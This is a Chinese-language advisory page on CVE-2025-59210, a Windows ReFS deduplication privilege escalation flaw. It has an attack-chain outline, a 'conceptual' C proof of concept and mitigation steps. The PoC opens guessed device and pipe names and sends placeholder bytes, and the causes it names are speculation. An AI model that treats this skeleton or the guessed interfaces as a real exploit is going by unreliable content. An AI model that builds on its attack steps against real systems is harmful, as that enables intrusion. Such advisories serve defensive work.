CVE-2025-59210 Windows ReFS去重服务本地权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-59210

漏洞类型

本地权限提升（Elevation of Privilege）

CVSS评分

7.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Microsoft Windows Resilient File System (ReFS) Deduplication Service

漏洞概述

CVE-2025-59210是Microsoft Windows操作系统中弹性文件系统（Resilient File System，简称ReFS）去重（Deduplication）服务中存在的一个高危本地权限提升漏洞。该漏洞由Microsoft安全团队（[email protected]）于2025年10月14日披露，CVSS 3.1基础评分为7.4分，属于高危级别。

ReFS是微软从Windows Server 2012开始引入的现代文件系统，旨在提供更高的数据完整性、可用性和可扩展性。ReFS去重服务（dedup）是Windows系统中用于在ReFS卷上检测和消除重复数据块的服务组件，通过减少磁盘空间占用来优化存储效率。该服务通常以SYSTEM权限运行，负责处理文件块级别的去重操作。

该漏洞属于典型的本地权限提升（Local Privilege Escalation, LPE）类型，攻击者需要先在目标系统上获得低权限的代码执行能力，然后利用ReFS去重服务中的安全缺陷，将权限提升至SYSTEM级别。从CVSS向量来看，该漏洞的攻击向量为本地（AV:L），无需任何特权（PR:N），也无需用户交互（UI:N），攻击复杂度较高（AC:H），一旦成功利用，将对系统的机密性、完整性和可用性均产生高（High）级别的影响。

由于ReFS去重服务在企业级Windows Server环境中广泛部署，特别是在使用存储空间直连（S2D）和去重功能的数据中心环境中，该漏洞可能对企业的数据安全和系统完整性构成严重威胁。攻击者利用此漏洞可以完全控制受影响的系统，执行任意代码，安装恶意程序，查看、修改或删除敏感数据，甚至创建新的管理员账户。

技术细节

该漏洞位于Windows ReFS去重服务的核心组件中，具体涉及去重引擎在处理特定文件系统操作或IOCTL（输入输出控制）请求时的权限验证逻辑缺陷。ReFS去重服务（dedupsvc）作为Windows系统服务以SYSTEM权限运行，负责管理ReFS卷上的数据块级去重操作，包括块指纹计算、块存储管理、块引用计数维护等关键功能。

从技术原理分析，该漏洞的产生可能源于以下几个方面：

1. **不安全的IOCTL处理**：ReFS去重服务可能未对通过DeviceIoControl等API发送的IOCTL请求进行充分的输入验证和权限检查，允许低权限用户向服务发送特制请求，触发服务以SYSTEM权限执行任意操作。

2. **命名管道（Named Pipe）权限不当**：去重服务可能通过命名管道与客户端通信，如果管道的访问控制列表（ACL）配置不当，低权限用户可能能够与服务进行交互并发送恶意数据。

3. **文件路径处理缺陷**：服务在处理去重操作时可能存在路径遍历或符号链接跟随漏洞，允许攻击者将文件操作重定向到敏感系统文件或注册表项。

4. **竞态条件（Race Condition）**：在多线程处理去重任务时，可能存在TOCTOU（Time-of-Check to Time-of-Use）类竞争条件，导致权限检查被绕过。

利用方式方面，攻击者首先需要在目标系统上获得基本的代码执行权限（即使是最低权限的普通用户账户），然后通过与ReFS去重服务进行交互（如发送特制的IOCTL请求或通过命名管道通信），触发服务中的漏洞代码路径，最终实现从普通用户权限到SYSTEM权限的提升。

攻击链分析

STEP 1

初始访问

攻击者首先需要在目标Windows系统上获得低权限的代码执行能力，可以通过钓鱼攻击、恶意软件投递、漏洞利用或其他社会工程学手段获取普通用户账户的访问权限。

STEP 2

权限侦察

攻击者确认目标系统是否运行ReFS文件系统以及ReFS去重服务是否启用。通过命令行执行 'fsutil fsinfo volumeinfo' 检查文件系统类型，使用 'sc query dedup' 确认去重服务状态。

STEP 3

漏洞触发

攻击者利用精心构造的IOCTL请求或通过命名管道与ReFS去重服务进行交互，向服务发送恶意数据，触发服务中的安全缺陷代码路径。

STEP 4

权限提升

由于ReFS去重服务以SYSTEM权限运行，漏洞利用成功后，攻击者的代码将在SYSTEM权限上下文中执行，实现从普通用户到SYSTEM账户的权限提升。

STEP 5

后渗透

获得SYSTEM权限后，攻击者可以完全控制系统，包括安装持久化后门、提取敏感数据、横向移动到其他系统、修改系统配置或部署勒索软件等。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * CVE-2025-59210 - Windows ReFS Dedup Service EoP PoC (Conceptual)
 * This is a conceptual proof-of-concept demonstrating the exploitation pattern
 * for the ReFS Deduplication Service local privilege escalation vulnerability.
 *
 * WARNING: This code is for educational and authorized testing purposes only.
 * Unauthorized use of this code against systems you do not own or have
 * explicit permission to test is illegal.
 */

#include <windows.h>
#include <stdio.h>
#include <tchar.h>
#include <psapi.h>

#pragma comment(lib, "advapi32.lib")
#pragma comment(lib, "psapi.lib")

// ReFS Dedup Service related constants
#define REFS_DEDUP_DEVICE_PATH  "\\\\.\\Dedup"
#define IOCTL_DEDUP_OPERATION   CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)

// Trigger the vulnerability by sending crafted IOCTL to the dedup service
BOOL TriggerVulnerability() {
    HANDLE hDevice = INVALID_HANDLE_VALUE;
    DWORD dwBytesReturned = 0;
    BOOL bResult = FALSE;

    // Step 1: Open a handle to the ReFS dedup device
    hDevice = CreateFileA(
        REFS_DEDUP_DEVICE_PATH,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open ReFS dedup device. Error: %lu\n", GetLastError());
        return FALSE;
    }

    printf("[+] Successfully opened ReFS dedup device handle.\n");

    // Step 2: Prepare crafted input buffer to trigger the vulnerability
    // The exact buffer structure depends on the specific flaw in the dedup service
    BYTE inputBuffer[1024] = {0};
    BYTE outputBuffer[1024] = {0};

    // Fill input buffer with crafted data to trigger the EoP path
    // This may involve setting up fake structures that the service will process
    // with SYSTEM privileges
    memset(inputBuffer, 0x41, sizeof(inputBuffer));

    // Step 3: Send the malicious IOCTL request
    bResult = DeviceIoControl(
        hDevice,
        IOCTL_DEDUP_OPERATION,
        inputBuffer,
        sizeof(inputBuffer),
        outputBuffer,
        sizeof(outputBuffer),
        &dwBytesReturned,
        NULL
    );

    if (bResult) {
        printf("[+] IOCTL request sent successfully.\n");
    } else {
        printf("[-] IOCTL request failed. Error: %lu\n", GetLastError());
    }

    // Cleanup
    CloseHandle(hDevice);
    return bResult;
}

// Alternative: Exploit via named pipe communication with dedup service
BOOL ExploitViaNamedPipe() {
    HANDLE hPipe = INVALID_HANDLE_VALUE;
    DWORD dwBytesWritten = 0;
    DWORD dwBytesRead = 0;
    char szPipeName[] = "\\\\.\\pipe\\dedup";

    // Attempt to connect to the dedup service named pipe
    // Wait for the pipe to become available
    if (!WaitNamedPipeA(szPipeName, 5000)) {
        printf("[-] Named pipe not available. Error: %lu\n", GetLastError());
        return FALSE;
    }

    hPipe = CreateFileA(
        szPipeName,
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    if (hPipe == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to connect to named pipe. Error: %lu\n", GetLastError());
        return FALSE;
    }

    printf("[+] Connected to dedup service named pipe.\n");

    // Send crafted payload to the dedup service
    char payload[] = "CRAFTED_DEDUP_PAYLOAD";
    WriteFile(hPipe, payload, sizeof(payload), &dwBytesWritten, NULL);

    CloseHandle(hPipe);
    return TRUE;
}

// Verify current privilege level
BOOL IsRunningAsSystem() {
    BOOL isSystem = FALSE;
    HANDLE hToken = NULL;
    DWORD dwSize = 0;
    PTOKEN_USER pTokenUser = NULL;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
        return FALSE;
    }

    GetTokenInformation(hToken, TokenUser, NULL, 0, &dwSize);
    pTokenUser = (PTOKEN_USER)malloc(dwSize);

    if (GetTokenInformation(hToken, TokenUser, pTokenUser, dwSize, &dwSize)) {
        // Check if running as SYSTEM (SID S-1-5-18)
        SID_IDENTIFIER_AUTHORITY ntAuthority = SECURITY_NT_AUTHORITY;
        PSID pSystemSid = NULL;
        AllocateAndInitializeSid(&ntAuthority, 1, SECURITY_LOCAL_SYSTEM_RID,
                                  0, 0, 0, 0, 0, 0, 0, &pSystemSid);
        isSystem = EqualSid(pTokenUser->User.Sid, pSystemSid);
        FreeSid(pSystemSid);
    }

    free(pTokenUser);
    CloseHandle(hToken);
    return isSystem;
}

int main(int argc, char* argv[]) {
    printf("[*] CVE-2025-59210 - ReFS Dedup Service EoP PoC\n");
    printf("[*] Current privilege level: %s\n",
           IsRunningAsSystem() ? "SYSTEM" : "User");

    printf("[*] Attempting to trigger vulnerability...\n");

    // Attempt exploitation
    if (TriggerVulnerability()) {
        printf("[+] Vulnerability triggered successfully.\n");
    }

    ExploitViaNamedPipe();

    printf("[*] Done.\n");
    return 0;
}

影响范围

Windows 10 Version 22H2（x64/x86/ARM64）

Windows 10 Version 21H2（x64/x86/ARM64）

Windows 11 Version 24H2（x64/ARM64）

Windows 11 Version 23H2（x64/ARM64）

Windows Server 2019

Windows Server 2022

Windows Server 2025

防御指南

临时缓解措施

在无法立即安装安全补丁的情况下，建议采取以下临时缓解措施：1）如果系统未使用ReFS去重功能，通过以管理员身份运行命令提示符执行 'sc config "dedup" start=disabled' 和 'sc stop "dedup"' 禁用ReFS去重服务；2）通过组策略（GPO）限制普通用户对系统服务和设备的访问权限；3）部署主机入侵检测系统（HIDS）监控对ReFS相关组件的异常访问；4）启用Windows Defender的实时保护和云端保护功能；5）限制PowerShell等脚本工具的使用，防止攻击者利用脚本工具进行漏洞利用；6）加强网络分段和访问控制，防止攻击者在获得初始访问权限后进行横向移动。